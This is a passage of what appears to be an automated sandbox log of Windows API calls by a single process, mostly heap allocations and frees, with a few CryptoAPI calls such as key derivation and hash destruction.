HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0249.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0249.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0249.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0249.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.991] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0249.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0249.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0249.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0249.991] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0249.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0249.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0249.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0249.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0249.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0249.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0249.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0249.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0249.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0249.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0249.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0249.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0249.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0249.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0249.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0249.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0249.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0249.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0249.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0249.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0249.993] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0249.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0249.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0249.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0249.993] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0249.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0249.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0249.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0249.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0249.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0249.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0249.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0249.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0249.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0249.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0249.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0249.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0249.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0249.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0249.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0249.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0249.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0249.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0249.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0249.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0249.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0249.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51ac0 [0249.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51ac0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0249.996] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa875d0) returned 1 [0249.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0249.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0249.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0249.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0249.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0249.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0249.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0249.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0249.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0249.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0249.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0249.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0249.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0249.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0249.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0249.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0249.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0249.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0249.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0249.998] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0249.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0249.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0249.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0249.998] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0249.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0249.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0249.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0249.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0249.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0249.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0249.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0249.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0249.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0249.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0249.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0249.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0249.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0249.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0249.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0249.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0249.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0250.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0250.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0250.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0250.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0250.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0250.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0250.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0250.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0250.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0250.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0250.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0250.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0250.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0250.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0250.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0250.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b08 [0250.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0250.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0250.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0250.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0250.005] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0250.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0250.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0250.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0250.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0250.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0250.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0250.005] CryptDestroyHash (hHash=0xa87050) returned 1 [0250.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0250.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0250.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0250.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0250.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0250.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0250.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0250.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0250.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0250.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0250.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0250.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: 